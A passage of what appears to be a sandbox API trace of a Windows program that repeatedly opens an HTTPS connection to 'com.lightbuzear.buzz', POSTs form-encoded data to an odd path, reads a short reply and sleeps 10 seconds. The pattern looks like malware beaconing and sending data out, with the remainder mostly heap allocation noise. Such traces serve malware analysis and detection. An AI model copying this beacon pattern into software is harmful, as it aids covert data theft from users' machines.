0x47ce5a0 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed50 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed38 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed50 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed38 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5a0 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0287.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be438 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0287.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be460 [0287.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0287.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0287.446] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0287.446] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be460 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0287.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0287.447] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be4b0 [0287.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0287.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0287.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be4b0 | out: hHeap=0x4780000) returned 1 [0287.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be488 [0287.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0287.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be668 [0287.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0287.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0287.459] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0287.459] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0288.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0288.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0288.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0288.459] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0288.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0288.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0288.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0288.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0288.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed50 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebd0 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed50 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be528 [0288.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0288.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0288.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0288.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be410 [0288.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0288.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be578 [0288.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0288.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0288.462] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0288.462] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0288.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be578 | out: hHeap=0x4780000) returned 1 [0288.463] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0288.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0288.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0288.498] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0288.498] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0288.498] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0288.498] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0288.498] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.498] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0288.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0288.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0288.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0288.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0288.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0288.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0288.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0288.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be618 [0288.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0288.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be618 | out: hHeap=0x4780000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be758 [0288.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0288.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0288.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0288.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0288.510] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0288.520] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0288.521] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0288.521] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0288.521] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0288.521] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0288.521] FreeLibrary (hLibModule=0x71570000) returned 1 [0288.521] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0288.521] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.522] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0288.522] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0288.522] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0288.523] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0288.523] Sleep (dwMilliseconds=0x2710) [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0288.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0288.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0288.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0288.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0288.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ea80 [0288.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec00 [0288.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ea80 | out: hHeap=0x4780000) returned 1 [0288.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0288.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0288.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eba0 [0288.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0288.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0288.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0288.547] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0288.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0288.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0288.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0288.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0288.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed68 [0288.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb10 [0288.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed68 | out: hHeap=0x4780000) returned 1 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0288.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed48 [0288.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0288.548] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0288.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0288.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0288.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0288.550] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0288.550] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0288.550] FreeLibrary (hLibModule=0x71780000) returned 1 [0288.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0288.550] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0288.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0288.551] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ea80 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0288.551] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0288.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ea80 | out: hHeap=0x4780000) returned 1 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ea80 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0288.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0288.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0288.552] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0288.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ea98 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec60 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ea98 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0288.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec60 | out: hHeap=0x4780000) returned 1 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed50 [0288.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be4b0 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be4b0 | out: hHeap=0x4780000) returned 1 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0288.554] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0288.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec00 [0288.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0288.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be500 [0288.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0288.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be500 | out: hHeap=0x4780000) returned 1 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be460 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0288.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be550 [0288.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0288.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0288.556] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0288.556] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0288.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be550 | out: hHeap=0x4780000) returned 1 [0288.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0288.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0288.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0288.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0288.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0288.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0288.557] HeapFree (in: hHeap=0x4780000, 